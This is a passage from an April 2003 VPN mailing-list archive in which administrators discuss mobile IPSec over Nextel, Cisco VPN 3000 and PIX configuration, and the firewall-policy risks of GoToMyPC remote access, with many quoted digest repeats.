Client with another client? If so, the simple answer is as far as I know, no you can not terminate the VPN tunnel from another client like the Cisco VPN Client at the VPN 3002. Simply because the Cisco VPN 3002 is a hardware client and not a concentrator. For a mobile solution the VPN 3000 Concentrator range i IMNHO really nice to work with and well suited. You can use the Cisco VPN Client on a laptop running all but the archaic versions of Windows, Mac OS X, Linux... There are 3rd party support for older Mac OS, Symbian, Pocket PC and PalmOS. HTH Regards, /Palm jim.atherton at netifice.com 2003-04-15 20:35 Till: vpn at lists.shmoo.com @ INTERNET Kopia: (Blank: Hakan Palm/Generic) ?rende: [VPN] IPSEC or PPTP over Nextel Packetstream Gold I need a mobile connectivity solution that supports either (I would like both and prefer IPSEC) IPSEC (Specifically Cisco VPN client 3.5.x or later) or PPTP (via Windows 2000 native PPTP). I need to connect to a Cisco VPN 3000 hardware client. I looked into this last year and actually tested with Nextel and neither worked and the guys at Nextel didn't know why. I ran across an old mail archive here that said that the compression used by Nextel Packetstream Gold used a compression technology that precluded use of IPSEC and that this would change sometime in the last quarter of 2002. Does anyone have any info about the current or near term status of this product? My company sells a set of VPN products and services and a useful mobile wireless VPN solution is needed. Before Richocet crashed we did some stuff with them. But since then we have had no wireless mobile solution. If there are any other cost effective mobile wireless solutions out there I would like to know. Personally, I need connectivity via my laptop and a can accept speeds of around 28.8 (true speed) but would like higher speeds. Lower, more expensive solutions are not currently acceptable. I cannot for instance use some sort of high speed satellite connection due to cost. Thanks for any info. _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From jim.atherton at netifice.com Tue Apr 15 17:18:55 2003 From: jim.atherton at netifice.com (Jim Atherton) Date: Tue, 15 Apr 2003 14:18:55 -0700 Subject: [VPN] IPSEC or PPTP over Nextel Packetstream Gold Message-ID: Guess I need to be a little more clear. We use the VPN 3000 concentrator. I have a laptop. I need to connect to my work environment with my laptop over some mobile (moving) method. I have the VPN 3000 software client on my PC and Windows 2000 PPTP (which the VPN 3000 also will allow as a client). I have a Nextel phone. I noticed that Nextel has a mobile connectivity solution (Packetstream gold) and tried about 6 months ago to make it work. It didn't. There is an old thread somewhere on this server that states that Motorola's compression hardware used by Nextel did not support IPSEC compression (this was during the summer of 2002) but that it would in late 2002. I am trying to find info about whether or not it does now (Nextel has no clue and noone at Nextel (that I can reach) knows anything about the technical details of this product Packetstream Gold. Also would accept alternative cost effective methods (have to approach at least 28.8 speeds). This is an interesting area that noone seems to have a clue about. Since my company resells various VPN solutions nationwide, I have a feeling at least of the potential for this as a product and am a little surprised that noone has filled this gap. -----Original Message----- From: hakan.palm at generic.se [mailto:hakan.palm at generic.se] Sent: Tuesday, April 15, 2003 5:08 PM To: jim.atherton at netifice.com Cc: vpn at lists.shmoo.com Subject: Ang: [VPN] IPSEC or PPTP over Nextel Packetstream Gold Jim, are you trying to connect to a Cisco VPN 3002 Hardware Client with another client? If so, the simple answer is as far as I know, no you can not terminate the VPN tunnel from another client like the Cisco VPN Client at the VPN 3002. Simply because the Cisco VPN 3002 is a hardware client and not a concentrator. For a mobile solution the VPN 3000 Concentrator range i IMNHO really nice to work with and well suited. You can use the Cisco VPN Client on a laptop running all but the archaic versions of Windows, Mac OS X, Linux... There are 3rd party support for older Mac OS, Symbian, Pocket PC and PalmOS. HTH Regards, /Palm jim.atherton at netifice.com 2003-04-15 20:35 Till: vpn at lists.shmoo.com @ INTERNET Kopia: (Blank: Hakan Palm/Generic) ?rende: [VPN] IPSEC or PPTP over Nextel Packetstream Gold I need a mobile connectivity solution that supports either (I would like both and prefer IPSEC) IPSEC (Specifically Cisco VPN client 3.5.x or later) or PPTP (via Windows 2000 native PPTP). I need to connect to a Cisco VPN 3000 hardware client. I looked into this last year and actually tested with Nextel and neither worked and the guys at Nextel didn't know why. I ran across an old mail archive here that said that the compression used by Nextel Packetstream Gold used a compression technology that precluded use of IPSEC and that this would change sometime in the last quarter of 2002. Does anyone have any info about the current or near term status of this product? My company sells a set of VPN products and services and a useful mobile wireless VPN solution is needed. Before Richocet crashed we did some stuff with them. But since then we have had no wireless mobile solution. If there are any other cost effective mobile wireless solutions out there I would like to know. Personally, I need connectivity via my laptop and a can accept speeds of around 28.8 (true speed) but would like higher speeds. Lower, more expensive solutions are not currently acceptable. I cannot for instance use some sort of high speed satellite connection due to cost. Thanks for any info. _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn From derricko at dwightcav.com Wed Apr 16 10:55:52 2003 From: derricko at dwightcav.com (derricko at dwightcav.com) Date: Wed, 16 Apr 2003 15:55:52 +0100 Subject: [VPN] vpn on a lan running win98se Message-ID: <002201c30428$46fa0820$1400a8c0@DERRICKO> We have a small LAN at work which is peer-to-peer, running win98se, proxy server software to ADSL, is it possible to make our 'fileserver' act as a server so the chairman can log on remotely as if he was in his office. If so what software do you suggest? regards Derrick -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.shmoo.com/pipermail/vpn/attachments/20030416/fa0bf8fd/attachment.htm From safieradam at hotmail.com Wed Apr 16 10:32:01 2003 From: safieradam at hotmail.com (safieradam) Date: Wed, 16 Apr 2003 10:32:01 -0400 Subject: [VPN] VPN help References: Message-ID: I wonder if this service would work on a PDA set up for browsing the internet. The client is Java applet downloaded from the gateway and they have a "wireless" version..... https://www.gotomypc.com Adam Safier ----- Original Message ----- From: To: Cc: ; Sent: Sunday, April 13, 2003 8:44 AM Subject: Ang: Re: [VPN] VPN help Ceritcom's movianVPN client, www.certicom.com/products/movian/movianvpn.html, can be used to connect to e.g. Cisco VPN 3000 and runs on PalmOS, Pocket PC and Symbian. They also have a FIPS-140-2 compliant client for PalmOS and Pocket PC. Might be worth looking at... HTH, /Palm From safieradam at hotmail.com Wed Apr 16 12:10:55 2003 From: safieradam at hotmail.com (safieradam) Date: Wed, 16 Apr 2003 12:10:55 -0400 Subject: [VPN] Clientless VPN Message-ID: I'm raising the specter of clientless VPN again because I came across this service which seems to meet the requirements: I do consider this a form of VPN. They may only be transmitting the screen image, essentially pcAnywhere like, but the functionality of getting the work done is there. They download the client as a java app so the user does not need to do special installation. Instead, it keeps polling a service server so the initial connection is outbound. Despite my security issues with it this is very attractive. Even has PDA, Mac and Unix support.... https://www.gotomypc.com Security issues: Password user authentication only. I assume this will change as the service evolves. On the positive side, they do seem to use digital signatures on the target - " multiple passwords, including an access code that resides on the host computer and is never transmitted or stored on GoToMyPC servers ". They advertise/encourage using Kiosk PC's for the client. If you are using someone else's PC you cannot be sure key-stroke/screen/memory logging is not going on so your personal passwords could be captured. A PC/PDA you control is better as long as you didn't execute some malware along the line. - You trust the service / software. You are downloading their Java applet, which could change anytime. You are essentially trusting them to encrypt the link from the client to the host and not peek. Well, the company trusts the VPN admin for the company VPN so if you have a contract with GoTo... That is what security is all about - who do you trust and for what? - Can bypasses firewall. At least our firewall policy needs review and this could be a headache. Both the client and the "target" initiate outbound connections to a third party service. If you company policy allows outbound surfing to just about any address your users could set this up to or from their office PC without your knowledge. You may need to implement IP and DNS name filtering for outbound traffic. That will only work if GoToMyPC play nice and don't get into rotating names and addresses or sell the server part to companies that use their own IP addresses to set up a corporate service. URL content filtering on outbound traffic might work. - Does the phrase below mean that if your policy is to disabled all downloading on the users PC GoToMyPC launch their own program that ignores the browser and downloads and runs a Java app? " For a user who connects to the host computer via a client with a Mac or Unix operating system (or from a Windows-based client that does not accept downloadable files), the Java-enabled Universal Viewer launches automatically. There is nothing the user needs to do to select the appropriate Viewer - our technology will automatically detect the client computer's operating system and launch the appropriate Viewer. " Any other holes I missed? I see a review of many companies policies coming up. Adam Safier From jmondaca at entelsa.entelnet.bo Wed Apr 16 14:38:21 2003 From: jmondaca at entelsa.entelnet.bo (jmondaca at entelsa.entelnet.bo) Date: Wed, 16 Apr 2003 14:38:21 -0400 Subject: [VPN] Multiple VPN connections PIX Message-ID: Is there any way to configure multiple simultaneously VPN connections only using cisco PIX. If not what other solution are available ? Regards, _______________________________________ Jorge Mondaca Gerencia Seguridad Corporativa (591) 2-2313030 ext 2021 (591) 72029832 From jac_des_vert at yahoo.com Wed Apr 16 15:49:44 2003 From: jac_des_vert at yahoo.com (Jac) Date: Wed, 16 Apr 2003 12:49:44 -0700 (PDT) Subject: [VPN] IPSEC or PPTP over Nextel Packetstream Gold In-Reply-To: Message-ID: <20030416194944.82384.qmail@web14101.mail.yahoo.com> Are you stuck with the VPN 3000? My understanding Nextel is currently testing Nortel Contivity platform for their mobile VPN offering. Should be available in Q4. I know they have a wireless IPSec client that may give you the solution you need. Maybe you can ask about that and see what they are offering. Jac --- Jim Atherton wrote: > Guess I need to be a little more clear. We use the > VPN 3000 concentrator. I > have a laptop. I need to connect to my work > environment with my laptop over > some mobile (moving) method. I have the VPN 3000 > software client on my PC > and Windows 2000 PPTP (which the VPN 3000 also will > allow as a client). I > have a Nextel phone. I noticed that Nextel has a > mobile connectivity > solution (Packetstream gold) and tried about 6 > months ago to make it work. > It didn't. There is an old thread somewhere on this > server that states that > Motorola's compression hardware used by Nextel did > not support IPSEC > compression (this was during the summer of 2002) but > that it would in late > 2002. I am trying to find info about whether or not > it does now (Nextel has > no clue and noone at Nextel (that I can reach) knows > anything about the > technical details of this product Packetstream Gold. > Also would accept > alternative cost effective methods (have to approach > at least 28.8 speeds). > This is an interesting area that noone seems to have > a clue about. Since my > company resells various VPN solutions nationwide, I > have a feeling at least > of the potential for this as a product and am a > little surprised that noone > has filled this gap. > > -----Original Message----- > From: hakan.palm at generic.se > [mailto:hakan.palm at generic.se] > Sent: Tuesday, April 15, 2003 5:08 PM > To: jim.atherton at netifice.com > Cc: vpn at lists.shmoo.com > Subject: Ang: [VPN] IPSEC or PPTP over Nextel > Packetstream Gold > > > Jim, > > are you trying to connect to a Cisco VPN 3002 > Hardware > Client with another client? > If so, the simple answer is as far as I know, no you > can not > terminate the VPN tunnel from another client like > the Cisco > VPN Client at the VPN 3002. Simply because the Cisco > VPN 3002 is a hardware client and not a > concentrator. > > For a mobile solution the VPN 3000 Concentrator > range i > IMNHO really nice to work with and well suited. You > can > use the Cisco VPN Client on a laptop running all but > the > archaic versions of Windows, Mac OS X, Linux... > There are > 3rd party support for older Mac OS, Symbian, Pocket > PC > and PalmOS. > > HTH > > Regards, > /Palm > > > > > jim.atherton at netifice.com > 2003-04-15 20:35 > > Till: vpn at lists.shmoo.com @ INTERNET > Kopia: (Blank: Hakan Palm/Generic) > ?rende: [VPN] IPSEC or PPTP over Nextel > Packetstream Gold > > I need a mobile connectivity solution that supports > either (I would like > both and prefer IPSEC) IPSEC (Specifically Cisco VPN > client 3.5.x or later) > or PPTP (via Windows 2000 native PPTP). I need to > connect to a Cisco VPN > 3000 hardware client. I looked into this last year > and actually tested with > Nextel and neither worked and the guys at Nextel > didn't know why. I ran > across an old mail archive here that said that the > compression used by > Nextel Packetstream Gold used a compression > technology that precluded use of > IPSEC and that this would change sometime in the > last quarter of 2002. Does > anyone have any info about the current or near term > status of this product? > My company sells a set of VPN products and services > and a useful mobile > wireless VPN solution is needed. Before Richocet > crashed we did some stuff > with them. But since then we have had no wireless > mobile solution. If there > are any other cost effective mobile wireless > solutions out there I would > like to know. Personally, I need connectivity via my > laptop and a can accept > speeds of around 28.8 (true speed) but would like > higher speeds. Lower, more > expensive solutions are not currently acceptable. I > cannot for instance use > some sort of high speed satellite connection due to > cost. > > Thanks for any info. > > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > > > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn __________________________________________________ Do you Yahoo!? The New Yahoo! Search - Faster. Easier. Bingo http://search.yahoo.com From safieradam at hotmail.com Wed Apr 16 17:16:23 2003 From: safieradam at hotmail.com (safieradam) Date: Wed, 16 Apr 2003 17:16:23 -0400 Subject: [VPN] Clientless VPN References: Message-ID: Corrections: "URL content filtering" was meant to be "URL scanning and web page content filtering". i.e. block encrypted web page content. "At least our firewall policy needs review" was supposed to be "At least _your_ firewall policy needs review". RG pointed out that there was a thread on the topic a while back. My quick review shows that the common solution was to block the GoToMyPC servers. While that may work for now because the GoToMyPC folks are nice enough to maintain a single server farm, it leaves a network open to variations / competitors, like http://www.htthost.com. Hackers have used tunneling for a long time so it's not just web pages and http. The only real solution I see is to prohibit encrypted application content in high level policy and actually block encrypted application content in your perimiter defense or proxy server. Adds a nice bit of overhead. At least content filtering is not a new concept and vendors exist. Adam Safier ----- Original Message ----- From: "safieradam" To: Sent: Wednesday, April 16, 2003 12:10 PM Subject: [VPN] Clientless VPN > I'm raising the specter of clientless VPN again because I came across this > service which seems to meet the requirements: > > I do consider this a form of VPN. They may only be transmitting the screen > image, essentially pcAnywhere like, but the functionality of getting the > work done is there. > > They download the client as a java app so the user does not need to do > special installation. Instead, it keeps polling a service server so the > initial connection is outbound. > > Despite my security issues with it this is very attractive. Even has PDA, > Mac and Unix support.... > > https://www.gotomypc.com > > Security issues: > > Password user authentication only. I assume this will change as the service > evolves. On the positive side, they do seem to use digital signatures on the > target - " multiple passwords, including an access code that resides on the > host computer and is never transmitted or stored on GoToMyPC servers ". > > They advertise/encourage using Kiosk PC's for the client. If you are using > someone else's PC you cannot be sure key-stroke/screen/memory logging is not > going on so your personal passwords could be captured. A PC/PDA you control > is better as long as you didn't execute some malware along the line. > > - You trust the service / software. You are downloading their Java applet, > which could change anytime. You are essentially trusting them to encrypt > the link from the client to the host and not peek. Well, the company trusts > the VPN admin for the company VPN so if you have a contract with GoTo... > That is what security is all about - who do you trust and for what? > > - Can bypasses firewall. At least our firewall policy needs review and th is > could be a headache. Both the client and the "target" initiate outbound > connections to a third party service. If you company policy allows outbound > surfing to just about any address your users could set this up to or from > their office PC without your knowledge. You may need to implement IP and > DNS name filtering for outbound traffic. That will only work if GoToMyPC > play nice and don't get into rotating names and addresses or sell the server > part to companies that use their own IP addresses to set up a corporate > service. URL content filtering on outbound traffic might work. > > - Does the phrase below mean that if your policy is to disabled all > downloading on the users PC GoToMyPC launch their own program that ignores > the browser and downloads and runs a Java app? > " For a user who connects to the host computer via a client with a Mac or > Unix operating system (or from a Windows-based client that does not accept > downloadable files), the Java-enabled Universal Viewer launches > automatically. There is nothing the user needs to do to select the > appropriate Viewer - our technology will automatically detect the client > computer's operating system and launch the appropriate Viewer. " > > Any other holes I missed? > > I see a review of many companies policies coming up. > > Adam Safier > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn > From scottn at s2s.ltd.uk Thu Apr 17 03:51:31 2003 From: scottn at s2s.ltd.uk (Scott Nursten) Date: Thu, 17 Apr 2003 08:51:31 +0100 Subject: [VPN] Multiple VPN connections PIX In-Reply-To: Message-ID: Hi Jorge, Of course there is. You don't really think Cisco would sell an enterprise VPN solution claiming that it can terminate between 10 and 2000+ connections when it can't do that, do you? :) All you need to do is add more entries in the crypto maps with higher/lower priorities. You can also use entirely different crypto maps _provided_ you have multiple interfaces, as only one map can be applied to an interface. In terms of processing etc. there is no _real_ (no flame pls) overhead by running through the priorities like this, just ensure that you config them in order of importance/usage. It's the nature of IPSec at any rate, as peers must negotiate crypto parameters, so you can consider this step as an extra negotiation parameter. If you need some help with the config, drop me a line. Regards, Scott Nursten CTO S2S Ltd Cisco Security Specialised Partner http://s2s.ltd.uk On 16/4/03 19:38, "jmondaca at entelsa.entelnet.bo" wrote: > > > > > Is there any way to configure multiple simultaneously VPN connections only > using cisco PIX. If not what other solution are available ? > > Regards, > > _______________________________________ > Jorge Mondaca > Gerencia Seguridad Corporativa > (591) 2-2313030 ext 2021 > (591) 72029832 > > > _______________________________________________ > VPN mailing list > VPN at lists.shmoo.com > http://lists.shmoo.com/mailman/listinfo/vpn From tjevans at bearingpoint.net Thu Apr 17 06:35:07 2003 From: tjevans at bearingpoint.net (Evans, TJ (BearingPoint)) Date: Thu, 17 Apr 2003 06:35:07 -0400 Subject: [VPN] Clientless VPN (apologies for the c ross-post) Message-ID: If I read your statement(s) correctly - You recommend blocking all encrypted traffic? IMHO - This leaves a few problems unsolved, and creates many new ones! Unsolved: Unencrypted, although possibly still tunneled, traffic. (ICMP tunnels, remote command prompt (e.g - NetCat), etc. etc.) Newly Created: You would block all SSL'ified websites? Block all encrypted mail? Etc. Don't get me wrong - there are ways to mitigate the new problems, but my concern would be that I think this would send the wrong message to your employees ... and discourage (prevent?) them from following good practices (encrypting important client emails, only logging into sites that make use of SSL, etc.). Naturally - the real-world / business needs of your employees may permit such an approach ... but I think this would lean too far to one side of the "security vs. functionality/usability" scale for most. Thanks! TJ -----Original Message----- From: safieradam [mailto:safieradam at hotmail.com] Sent: Wednesday, April 16, 2003 5:16 PM To: vpn at lists.shmoo.com Subject: Re: [VPN] Clientless VPN Corrections: "URL content filtering" was meant to be "URL scanning and web page content filtering". i.e. block encrypted web page content. "At least our firewall policy needs review" was supposed to be "At least _your_ firewall policy needs review". RG pointed out that there was a thread on the topic a while back. My quick review shows that the common solution was to block the GoToMyPC servers. While that may work for now because the GoToMyPC folks are nice enough to maintain a single server farm, it leaves a network open to variations / competitors, like http://www.htthost.com. Hackers have used tunneling for a long time so it's not just web pages and http. The only real solution I see is to prohibit encrypted application content in high level policy and actually block encrypted application content in your perimiter defense or proxy server. Adds a nice bit of overhead. At least content filtering is not a new concept and vendors exist. Adam Safier ----- Original Message ----- From: "safieradam" To: Sent: Wednesday, April 16, 2003 12:10 PM Subject: [VPN] Clientless VPN I'm raising the specter of clientless VPN again because I came across this service which seems to meet the requirements: I do consider this a form of VPN. They may only be transmitting the screen image, essentially pcAnywhere like, but the functionality of getting the work done is there. They download the client as a java app so the user does not need to do special installation. Instead, it keeps polling a service server so the initial connection is outbound. Despite my security issues with it this is very attractive. Even has PDA, Mac and Unix support.... https://www.gotomypc.com Security issues: Password user authentication only. I assume this will change as the Service evolves. On the positive side, they do seem to use digital signatures on the target - " multiple passwords, including an access code that resides on the host computer and is never transmitted or stored on GoToMyPC servers ". They advertise/encourage using Kiosk PC's for the client. If you are using someone else's PC you cannot be sure key-stroke/screen/memory logging is not going on so your personal passwords could be captured. A PC/PDA you control is better as long as you didn't execute some malware along the line. - You trust the service / software. You are downloading their Java applet, which could change anytime. You are essentially trusting them to encrypt the link from the client to the host and not peek. Well, the company trusts the VPN admin for the company VPN so if you have a contract with GoTo... That is what security is all about - who do you trust and for what? - Can bypasses firewall. At least our firewall policy needs review and th is could be a headache. Both the client and the "target" initiate outbound connections to a third party service. If you company policy allows outbound surfing to just about any address your users could set this up to or from their office PC without your knowledge. You may need to implement IP and DNS name filtering for outbound traffic. That will only work if GoToMyPC play nice and don't get into rotating names and addresses or sell the server part to companies that use their own IP addresses to set up a corporate service. URL content filtering on outbound traffic might work. - Does the phrase below mean that if your policy is to disabled all downloading on the users PC GoToMyPC launch their own program that ignores the browser and downloads and runs a Java app? " For a user who connects to the host computer via a client with a Mac or Unix operating system (or from a Windows-based client that does not accept downloadable files), the Java-enabled Universal Viewer launches automatically. There is nothing the user needs to do to select the appropriate Viewer - our technology will automatically detect the client computer's operating system and launch the appropriate Viewer. " Any other holes I missed? I see a review of many companies policies coming up. Adam Safier ****************************************************************************** The information in this email is confidential and may be legally privileged. Access to this email by anyone other than the intended addressee is unauthorized. If you are not the intended recipient of this message, any review, disclosure, copying, distribution, retention, or any action taken or omitted to be taken in reliance on it is prohibited and may be unlawful. If you are not the intended recipient, please reply to or forward a copy of this message to the sender and delete the message, any attachments, and any copies thereof from your system. ****************************************************************************** From greg.l.owens at verizon.net Thu Apr 17 08:26:19 2003 From: greg.l.owens at verizon.net (Greg Owens Jr) Date: Thu, 17 Apr 2003 08:26:19 -0400 Subject: [VPN] Multiple VPN connections PIX Message-ID: <001101c304dc$90973250$0100a8c0@rock.rock.com> Subject: [VPN] Multiple VPN connections PIX Is there any way to configure multiple simultaneously VPN connections only using cisco PIX. If not what other solution are available ? Yes the PIX can do this. Just configure some crypto map with different numebers Greg Owens 202-398-2552 fax 202-399-7690 -----Original Message----- From: vpn-admin at lists.shmoo.com [mailto:vpn-admin at lists.shmoo.com] On Behalf Of vpn-request at lists.shmoo.com Sent: Thursday, April 17, 2003 8:00 AM To: vpn at lists.shmoo.com Subject: VPN digest, Vol 1 #157 - 8 msgs Send VPN mailing list submissions to vpn at lists.shmoo.com To subscribe or unsubscribe via the World Wide Web, visit http://lists.shmoo.com/mailman/listinfo/vpn or, via email, send a message with subject or body 'help' to vpn-request at lists.shmoo.com You can reach the person managing the list at vpn-admin at lists.shmoo.com When replying, please edit your Subject line so it is more specific than "Re: Contents of VPN digest..." Today's Topics: 1. Ang: [VPN] IPSEC or PPTP over Nextel Packetstream Gold (hakan.palm at generic.se) 2. RE: IPSEC or PPTP over Nextel Packetstream Gold (Jim Atherton) 3. vpn on a lan running win98se (derricko at dwightcav.com) 4. Re: Re: [VPN] VPN help (safieradam) 5. Clientless VPN (safieradam) 6. Multiple VPN connections PIX (jmondaca at entelsa.entelnet.bo) 7. RE: IPSEC or PPTP over Nextel Packetstream Gold (Jac) 8. Re: Clientless VPN (safieradam) --__--__-- Message: 1 From: hakan.palm at generic.se Date: Tue, 15 Apr 2003 23:08:21 +0200 To: jim.atherton at netifice.com Cc: vpn at lists.shmoo.com Subject: Ang: [VPN] IPSEC or PPTP over Nextel Packetstream Gold Jim, are you trying to connect to a Cisco VPN 3002 Hardware Client with another client? If so, the simple answer is as far as I know, no you can not terminate the VPN tunnel from another client like the Cisco VPN Client at the VPN 3002=2E Simply because the Cisco VPN 3002 is a hardware client and not a concentrator=2E For a mobile solution the VPN 3000 Concentrator range i IMNHO really nice to work with and well suited=2E You can use the Cisco VPN Client on a laptop running all but the archaic versions of Windows, Mac OS X, Linux=2E=2E=2E There are 3rd party support for older Mac OS, Symbian, Pocket PC and PalmOS=2E HTH Regards, /Palm jim=2Eatherton at netifice=2Ecom 2003-04-15 20:35 Till: vpn at lists=2Eshmoo=2Ecom @ INTERNET Kopia: (Blank: Hakan Palm/Generic) =C4rende: [VPN] IPSEC or PPTP over Nextel Packetstream Gold I need a mobile connectivity solution that supports either (I would like both and prefer IPSEC) IPSEC (Specifically Cisco VPN client 3=2E5=2Ex or later) or PPTP (via Windows 2000 native PPTP)=2E I need to connect to a Cisco VPN 3000 hardware client=2E I looked into this last year and actually tested with Nextel and neither worked and the guys at Nextel didn't know why=2E I ran across an old mail archive here that said that the compression used by Nextel Packetstream Gold used a compression technology that precluded use of IPSEC and that this would change sometime in the last quarter of 2002=2E Does anyone have any info about the current or near term status of this product? My company sells a set of VPN products and services and a useful mobile wireless VPN solution is needed=2E Before Richocet crashed we did some stuff with them=2E But since then we have had no wireless mobile solution=2E If there are any other cost effective mobile wireless solutions out there I would like to know=2E Personally, I need connectivity via my laptop and a can accept speeds of around 28=2E8 (true speed) but would like higher speeds=2E Lower, more expensive solutions are not currently acceptable=2E I cannot for instance use some sort of high speed satellite connection due to cost=2E Thanks for any info=2E _______________________________________________ VPN mailing list VPN at lists=2Eshmoo=2Ecom http://lists=2Eshmoo=2Ecom/mailman/listinfo/vpn --__--__-- Message: 2 From: Jim Atherton To: "'hakan.palm at generic.se'" , Jim Atherton Cc: vpn at lists.shmoo.com Subject: RE: [VPN] IPSEC or PPTP over Nextel Packetstream Gold Date: Tue, 15 Apr 2003 14:18:55 -0700 Guess I need to be a little more clear. We use the VPN 3000 = concentrator. I have a laptop. I need to connect to my work environment with my laptop = over some mobile (moving) method. I have the VPN 3000 software client on my = PC and Windows 2000 PPTP (which the VPN 3000 also will allow as a client). = I have a Nextel phone. I noticed that Nextel has a mobile connectivity solution (Packetstream gold) and tried about 6 months ago to make it = work. It didn't. There is an old thread somewhere on this server that states = that Motorola's compression hardware used by Nextel did not support IPSEC compression (this was during the summer of 2002) but that it would in = late 2002. I am trying to find info about whether or not it does now (Nextel = has no clue and noone at Nextel (that I can reach) knows anything about the technical details of this product Packetstream Gold. Also would accept alternative cost effective methods (have to approach at least 28.8 = speeds). This is an interesting area that noone seems to have a clue about. = Since my company resells various VPN solutions nationwide, I have a feeling at = least of the potential for this as a product and am a little surprised that = noone has filled this gap. -----Original Message----- From: hakan.palm at generic.se [mailto:hakan.palm at generic.se] Sent: Tuesday, April 15, 2003 5:08 PM To: jim.atherton at netifice.com Cc: vpn at lists.shmoo.com Subject: Ang: [VPN] IPSEC or PPTP over Nextel Packetstream Gold Jim, are you trying to connect to a Cisco VPN 3002 Hardware Client with another client? If so, the simple answer is as far as I know, no you can not terminate the VPN tunnel from another client like the Cisco VPN Client at the VPN 3002. Simply because the Cisco VPN 3002 is a hardware client and not a concentrator. For a mobile solution the VPN 3000 Concentrator range i IMNHO really nice to work with and well suited. You can use the Cisco VPN Client on a laptop running all but the archaic versions of Windows, Mac OS X, Linux... There are 3rd party support for older Mac OS, Symbian, Pocket PC and PalmOS. HTH Regards, /Palm jim.atherton at netifice.com 2003-04-15 20:35 =09 Till: vpn at lists.shmoo.com @ INTERNET Kopia: (Blank: Hakan Palm/Generic) =C4rende: [VPN] IPSEC or PPTP over Nextel Packetstream Gold I need a mobile connectivity solution that supports either (I would = like both and prefer IPSEC) IPSEC (Specifically Cisco VPN client 3.5.x or = later) or PPTP (via Windows 2000 native PPTP). I need to connect to a Cisco = VPN 3000 hardware client. I looked into this last year and actually tested = with Nextel and neither worked and the guys at Nextel didn't know why. I ran across an old mail archive here that said that the compression used by Nextel Packetstream Gold used a compression technology that precluded = use of IPSEC and that this would change sometime in the last quarter of 2002. = Does anyone have any info about the current or near term status of this = product? My company sells a set of VPN products and services and a useful mobile wireless VPN solution is needed. Before Richocet crashed we did some = stuff with them. But since then we have had no wireless mobile solution. If = there are any other cost effective mobile wireless solutions out there I = would like to know. Personally, I need connectivity via my laptop and a can = accept speeds of around 28.8 (true speed) but would like higher speeds. Lower, = more expensive solutions are not currently acceptable. I cannot for instance = use some sort of high speed satellite connection due to cost. Thanks for any info. _______________________________________________ VPN mailing list VPN at lists.shmoo.com http://lists.shmoo.com/mailman/listinfo/vpn --__--__-- Message: 3 From: derricko at dwightcav.com To: Date: Wed, 16 Apr 2003 15:55:52 +0100 Subject: [VPN] vpn on a lan running win98se This is a multi-part message in MIME format. ------=_NextPart_000_001F_01C30430.A88C1580 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable We have a small LAN at work which is peer-to-peer, running win98se, = proxy server software to ADSL, is it possible to make our 'fileserver' = act as a server so the chairman can log on remotely as if he was in his = office. If so what software do you suggest? regards Derrick ------=_NextPart_000_001F_01C30430.A88C1580 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

We have a small LAN at work which is peer-to-peer, = running=20 win98se, proxy server software to ADSL, is it possible to make our = 'fileserver'=20 act as a server so the chairman can log on remotely as if he was in his=20 office.

If so what software do you = suggest?

regards

Derrick

------=_NextPart_000_001F_01C30430.A88C1580-- --__--__-- Message: 4 From: "safieradam" To: Cc: , Subject: Re: Re: [VPN] VPN help Date: Wed, 16 Apr 2003 10:32:01 -0400 I wonder if this service would work on a PDA set up for browsing the internet. The client is Java applet downloaded from the gateway and they have a "wireless" version..... https://www.gotomypc.com Adam Safier ----- Original Message ----- From: To: Cc: ; Sent: Sunday, April 13, 2003 8:44 AM Subject: Ang: Re: [VPN] VPN help Ceritcom's movianVPN client, www.certicom.com/products/movian/movianvpn.html, can be used to connect to e.g. Cisco VPN 3000 and runs on PalmOS, Pocket PC and Symbian. They also have a FIPS-140-2 compliant client for PalmOS and Pocket PC. Might be worth looking at... HTH, /Palm --__--__-- Message: 5 From: "safieradam" To: Date: Wed, 16 Apr 2003 12:10:55 -0400 Subject: [VPN] Clientless VPN I'm raising the specter of clientless VPN again because I came across this service which seems to meet the requirements: I do consider this a form of VPN. They may only be transmitting the screen image, essentially pcAnywhere like, but the functionality of getting the work done is there. They download the client as a java app so the user does not need to do special installation. Instead, it keeps polling a service server so the initial connection is outbound. Despite my security issues with it this is very attractive. Even has PDA, Mac and Unix support.... https://www.gotomypc.com Security issues: Password user authentication only. I assume this will change as the service evolves. On the positive side, they do seem to use digital signatures on the target - " multiple passwords, including an access code that resides on the host computer and is never transmitted or stored on GoToMyPC servers ". They advertise/encourage using Kiosk PC's for the client. If you are using someone else's PC you cannot be sure key-stroke/screen/memory logging is not going on so your personal passwords could be captured. A PC/PDA you control is better as long as you didn't execute some malware along the line. - You trust the service / software. You are downloading their Java applet, which could change anytime. You are essentially trusting them to encrypt the link from the client to the host and not peek. Well, the company trusts the VPN admin for the company VPN so if you have a contract with GoTo... That is what security is all about - who do you trust and for what? - Can bypasses firewall. At least our firewall policy needs review and this could be a headache. Both the client and the "target" initiate outbound connections to a third party service. If you company policy allows outbound surfing to just about any address your users could set this up to or from their office PC without your knowledge. You may need to implement IP and DNS name filtering for outbound traffic. That will only work if GoToMyPC play nice and don't get into rotating names and addresses or sell the server part to companies that use their own IP addresses to set up a corporate service. URL content filtering on outbound traffic might work. - Does the phrase below mean that if your policy is to disabled all downloading on the users PC GoToMyPC launch their own program that ignores the browser and downloads and runs a Java app? " For a user who connects to the host computer via a client with a Mac or Unix operating system (or from a Windows-based client that does not accept downloadable files), the Java-enabled Universal Viewer launches automatically. There is nothing the user needs to do to select the appropriate Viewer - our technology will automatically detect the client computer's operating system and launch the appropriate Viewer. " Any other holes I missed? I see a review of many companies policies coming up. Adam Safier --__--__-- Message: 6 To: From: jmondaca at entelsa.entelnet.bo Date: Wed, 16 Apr 2003 14:38:21 -0400 Subject: [VPN] Multiple VPN connections PIX Is there any way to configure multiple simultaneously VPN connections only using cisco PIX. If not what other solution are available ? Regards, _______________________________________ Jorge Mondaca Gerencia Seguridad 